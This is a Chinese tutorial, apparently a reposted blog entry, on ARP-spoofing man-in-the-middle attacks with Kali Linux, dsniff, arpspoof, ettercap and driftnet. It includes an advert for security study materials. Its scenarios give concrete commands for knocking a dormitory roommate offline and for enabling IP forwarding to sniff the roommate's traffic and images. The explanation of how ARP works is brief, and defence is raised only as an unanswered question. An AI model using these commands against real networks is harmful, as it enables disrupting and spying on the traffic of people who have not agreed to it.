中間人攻擊之ARP欺騙

x00、軟體安裝及環境搭建

第一步、Kali下載匯入

Kali下載地址(VMware版本):

https://images。kali。org/virtual-images/kali-linux-2020。4-vmware-amd64。7z

解壓後,開啟VMware,

中間人攻擊之ARP欺騙

中間人攻擊之ARP欺騙

【——全網最全的網路安全學習資料包分享給愛學習的你,關注我,私信回覆“領取”獲取——】

1.網路安全多個方向學習路線

2.全網最全的CTF入門學習資料

3.一線大佬實戰經驗分享筆記

4.網安大廠面試題合集

5.紅藍對抗實戰技術秘籍

6.網路安全基礎入門、Linux、web安全、滲透測試方面影片

第二步、Dsniff套件安裝

Dsniff是一個基於unix系統網路嗅探工具。

Dsniff是一個工具集,主要分為四類:

純粹被動地進行網路活動監視的工具,包括:dsniff、filesnarf、mailsnarf 、msgsnarf、urlsnarf、webspy;

針對SSH和SSL的MITM(Man-In-The-Middle)“攻擊”工具,包括sshmitm和webmitm;

發起主動欺騙的工具,包括:arpspoof、dnsspoof、macof;

其它工具,包括tcpkill、tcpnice。

kali@kali:~#sudo apt-get update #更新軟體列表

kali@kali:~# sudo apt-get install dsniff #從軟體列表中下載安裝dsniff

中間人攻擊之ARP欺騙

測試是否安裝成功

中間人攻擊之ARP欺騙

我們發現其實執行這個軟體和許可權是息息相關的,我們切換root執行

中間人攻擊之ARP欺騙

涉及到的軟體都能夠正常執行(本文僅僅涉及到arpspoof)

中間人攻擊之ARP欺騙

0x01、場景一(讓宿舍室友斷網)

中間人攻擊之ARP欺騙

第一步、找到室友的ip

NBTSCAN可以獲取到PC的真實IP地址和MAC地址。

nbtscan -r 192。168。10。17/24

中間人攻擊之ARP欺騙

第二步、讓他斷網

arpspoof -i 網絡卡 -t 目標IP 閘道器

arpspoof -i eth0 -t 192。168。8。213 192。168。8。1

中間人攻擊之ARP欺騙

中間人攻擊之ARP欺騙

#0x02、場景二(監控室友網路)

第一步、開啟ip轉發功能(讓他上網)

為使受害者主機的資料包能夠順利收發,我們需在Kali Linux中開啟IP轉發功能

A、開啟:echo 1 > /proc/sys/net/ipv4/ip_forward;

中間人攻擊之ARP欺騙

第二步、開啟流量嗅探工具

driftnet 用於抓取網路流量中的圖片,並將他們顯示出來。ettercap是一個基於ARP地址欺騙方式的網路嗅探工具,主要適用於交換區域網絡。

apt-get install driftnet //安裝driftnet工具

ettercap -Tq -i eth0 //-T是僅使用文字GUI,-q不顯示資料內容,-i是指定網絡卡

driftnet -i eth0 //選擇監聽埠為eth0

wireshark

中間人攻擊之ARP欺騙

中間人攻擊之ARP欺騙

0x03、場景三(實戰案例介紹)

中間人攻擊之ARP欺騙

中間人攻擊之ARP欺騙

中間人攻擊之ARP欺騙

0x04、原理分析

第一步、ARP請求

中間人攻擊之ARP欺騙

中間人攻擊之ARP欺騙

第二步、ARP響應

中間人攻擊之ARP欺騙

中間人攻擊之ARP欺騙

前提知識:

ARP是幹啥的?

Arp是地址解析協議,透過ip獲取mac地址的協議(同網段才能獲取)

2。為啥要獲取mac地址?

表面上我們看到的是透過ip進行通訊,實際上區域網都是透過mac地址進行通訊,

0x05、思考題

ARP攻擊應用場景?

ARP攻擊應該如何防護?